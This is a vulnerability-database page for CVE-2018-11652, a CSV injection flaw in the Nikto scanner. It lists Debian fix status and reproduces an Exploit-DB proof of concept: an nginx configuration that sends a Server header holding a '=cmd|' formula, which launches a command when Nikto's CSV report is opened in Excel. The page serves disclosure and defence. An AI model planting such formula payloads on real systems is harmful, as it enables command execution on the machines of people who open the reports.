CVE-2018-11652

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers to inject arbitrary OS commands via the Server field in an HTTP response header, which is directly injected into a CSV report.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-44899 local linux text · 1 KB

Adam Greenhill · 2018-06-18

Nikto 2.1.6 - CSV Injection

text exploit Source: Exploit-DB

# Exploit Title: Nikto 2.1.6 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-01	
# Exploit Author: Adam Greenhill
# Vendor Homepage: https://cirt.net/Nikto2
# Software Link: https://github.com/sullo/nikto
# Affected Version: 2.1.6, 2.1.5
# Category: Applications
# Tested on: Kali Linux 4.14 x64
# CVE : CVE-2018-11652
 
# Technical Description:
#  CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers 
# to inject arbitrary OS commands via the Server field in an HTTP response header, 
# which is directly injected into a CSV report.
 
# PoC
# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras
# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file:

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
    worker_connections 768;
    # multi_accept on;
}

http {
    server_tokens off; # removed pound sign
    more_set_headers "Server: =cmd|' /C calc'!'A1'";

    server {
        listen 80;

        server_name localhost;

        location /hello {
            return 200 "hello world";
        }
    }
}

# Restart the server: service nginx restart
# Scan the nginx server with Nikto configured to output the results to a CSV file:

nikto -h <nginx address>:80 -o vuln.csv

# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting 
# to execute

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1:2.1.5-3`
sid	Fixed	`1:2.1.5-3`
forky	Fixed	`1:2.1.5-3`
bullseye	Fixed	`1:2.1.5-3`
bookworm	Fixed	`1:2.1.5-3`

References

https://security-tracker.debian.org/tracker/CVE-2018-11652

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.